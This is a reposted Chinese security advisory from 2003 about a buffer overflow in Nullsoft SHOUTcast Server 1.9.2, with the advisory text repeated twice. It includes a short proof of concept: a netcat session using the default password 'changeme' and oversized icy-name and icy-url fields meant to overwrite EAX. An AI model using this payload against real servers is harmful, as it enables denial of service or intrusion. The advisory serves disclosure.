- Rongsen.Com.Cn 版权所有 2008-2010 京ICP备08007000号 京公海网安备11010802026356号 朝阳网安编号:110105199号
- 北京黑客防线网安工作室-黑客防线网安服务器维护基地为您提供专业的
服务器维护
,企业网站维护
,网站维护
服务 - (建议采用1024×768分辨率,以达到最佳视觉效果) Powered by 黑客防线网安 ©2009-2010 www.rongsen.com.cn
Nullsoft SHOUTcast icy-name/icy-url内存破坏漏洞
作者:黑客防线网安网站维护基地 来源:黑客防线网安网站维护基地 浏览次数:0 |
黑客防线网安网讯:发布时间:2003-11-03更新时间:2003-11-03严重程度:高威胁程度:普通用户访问权限错误类型:环境错误利用方式:服务器模式BUGTRAQ ID:8954受影响系统
NullSoft Shoutcast Server 1.9.2 Win32详细描述lsoft ...
NullSoft Shoutcast Server 1.9.2 Win32详细描述lsoft ...
发布时间:2003-11-03
更新时间:2003-11-03
严重程度:高
威胁程度:普通用户访问权限
错误类型:环境错误
利用方式:服务器模式
BUGTRAQ ID:8954
受影响系统
lsoft SHOUTcast Server由于对授权用户提供的命令缺少充分边界检查,登录后提交超长字符串的icy-name(Server Desc)和icy-url(Stream URL)命令,可导致触发溢出.
测试代码
>nc target 8001
changeme
icy-name:AAA...[Ax275]BBBB[rewrite EAX]
icy-genre:DoS radio
icy-url:AAA...[Ax288]BBBB[rewrite EAX]
icy-pub:1
icy-irc:N/A
icy-icq:N/A
icy-aim:N/A
icy-br:160
...
stream audio data
...
P.S. Default password "changeme" !!!
相关信息
HEX <hex@hex_net_ru.securityfocus.com>.
参考:http://www.securityfocus.com/archive/1/343177
相关主页:http://www.shoutcast.com/
更新时间:2003-11-03
严重程度:高
威胁程度:普通用户访问权限
错误类型:环境错误
利用方式:服务器模式
BUGTRAQ ID:8954
受影响系统
NullSoft Shoutcast Server 1.9.2 Win32详细描述
lsoft SHOUTcast Server由于对授权用户提供的命令缺少充分边界检查,登录后提交超长字符串的icy-name(Server Desc)和icy-url(Stream URL)命令,可导致触发溢出.
测试代码
>nc target 8001
changeme
icy-name:AAA...[Ax275]BBBB[rewrite EAX]
icy-genre:DoS radio
icy-url:AAA...[Ax288]BBBB[rewrite EAX]
icy-pub:1
icy-irc:N/A
icy-icq:N/A
icy-aim:N/A
icy-br:160
...
stream audio data
...
P.S. Default password "changeme" !!!
相关信息
HEX <hex@hex_net_ru.securityfocus.com>.
参考:http://www.securityfocus.com/archive/1/343177
相关主页:http://www.shoutcast.com/
黑客防线网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show.php?contentid-3045.html
新闻栏目
| 我要申请本站:N点 | 黑客防线官网 | |
| 专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479 |